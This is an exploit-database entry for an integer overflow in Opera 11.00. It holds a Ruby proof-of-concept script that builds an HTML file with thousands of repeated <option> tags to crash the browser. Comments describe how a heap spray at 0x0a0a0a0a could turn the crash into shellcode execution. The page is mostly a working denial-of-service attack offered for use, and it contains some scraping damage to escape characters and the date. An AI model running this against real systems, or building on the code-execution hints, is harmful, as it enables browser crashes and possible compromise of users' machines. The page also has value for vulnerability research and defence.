[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Opera Web Browser 11.00 Integer Overflow Vulnerability
# Published : 2011-01-25
# Author : C4SS!0 G0M3S
# Previous Title : FreeBSD 8.0 Local Denial of Service (forced reboot)
# Next Title : Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
#
#
#[+]Exploit Title: Exploit Integer Overflow Opera Web Browser 11.00
#[+]Date: 24�12011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://get12.opera.com/pub/opera/win/1100/int/Opera_1100_int_Setup.exe
#[+]Version: 11.00
#[+]Tested On: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#
#Note:
#This exploit is only a Denial of Service in opera web browser
#I created a poc using heap spray that allow code execution
#but I will not post here because it can be used for evil
#And I do not want that.
# for you to explore the program you control with the number esi childrens then created using a spray heap address any such
#0a0a0a0a the data in address should be the point to the beginning of the shellcode
#0a0a0a0a => x90x90x90 => and your shellcode
#Then the function mov eax, [esi] places the value in eax then the program call eax and boom run shellcode !!!!!
#
#
#
print "[*]Creating the Exploitn"
i = 0
buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>n"
while i<0x4141
buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>n"
i+=1
end
HTML =
"<html>n"+
"<body>nn"+
"<select>nn"
HTML+=buf * 100
HTML += "nnn</select>nn"+
"</body>nnn"+
"</html>nnnnn"
f = File.open("Exploit_opera_11.00.html","w")
f.puts HTML
f.close
puts "nn[*]File Created With Sucess"
sleep(1)
puts "[*]Go to my Site www.invasao.com.br!"
sleep(1)